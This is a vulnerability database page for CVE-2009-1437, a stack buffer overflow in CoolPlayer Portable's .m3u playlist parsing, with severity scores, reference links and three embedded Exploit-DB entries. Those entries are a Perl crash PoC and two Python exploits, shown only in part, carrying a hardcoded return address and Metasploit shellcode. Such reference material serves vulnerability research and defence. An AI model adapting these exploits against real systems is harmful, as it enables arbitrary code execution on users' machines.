CVE-2009-1437
Published 2009-04-27
Priority P351, critical, 9.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 13.99% (96.1th percentile)
Stack-based buffer overflow in PortableApps CoolPlayer Portable (aka CoolPlayer+ Portable) 2.19.6 and earlier allows remote attackers to execute arbitrary code via a long string in a malformed playlist (.m3u) file. NOTE: this may overlap CVE-2008-3408.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| coolplayer | coolplayer | — | — |
No detection rules found.
Exploit-DB
CoolPlayer Portable 2.19.1 - '.m3u' Local Buffer Overflow (2)
exploitdb·2009-04-22
---
```python
#!/usr/bin/python
#[*] Usage : coolplayer.py
#[*] Bug : CoolPlayer Portable(m3u) Buffer Overflow exploit
#[*] Founder : Gold_m
#[*] First exploiter : stack "he is my friend :)"
#[*] Tested on : Xp sp2 (fr)
#[*] Greetings : All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com
#[*] Note: I didn't know why the stack's exploit won't work for me but I found that the junk data wasn't right in my case.
#[*] and we have to expand the nops to pass the null byte.
#[*] it worked for me from the beginning.
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x79"
"\xe4\x94\xba\x83\xeb\xfc\xe2\xf4\x85\x0c\xd0\xba\x79\
```
Exploit-DB
CoolPlayer Portable 2.19.1 - '.m3u' Local Buffer Overflow (1)
exploitdb·2009-04-22
---
```python
# CoolPlayer Portable 2.19.1 (m3u) Buffer Overflow exploit
# Credit To Gold_m http://www.milw0rm.com/exploits/8489
# I test it 12 times but the 13 is worked but I don't know maybe it work in first time for you
# By Stack
chars = "\x41" * 212
eip = "\xED\x1E\x94\x7C" # ntdll.dll jmp esp SP 2 FR / EN
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x
```
Exploit-DB
CoolPlayer Portable 2.19.1 - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-20
---
```perl
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ##
# # CoolPlayerp Portable 2.19.1 (.M3U File) Local Stack Overflow POC # #
# ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ## ### ## ## ## ##
my $chars= "A" x 4104;
my $file="goldm.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";
print "Thanx Tryag.Com";
# milw0rm.com [2009-04-20]
```
No writeups or analysis indexed.
http://osvdb.org/53885
http://secunia.com/advisories/34816
https://exchange.xforce.ibmcloud.com/vulnerabilities/49984
https://hansesecure.de/vulnerability-in-coolplayer/
https://www.exploit-db.com/exploits/8489
https://www.exploit-db.com/exploits/8519
https://www.exploit-db.com/exploits/8520
Published: 2009-04-27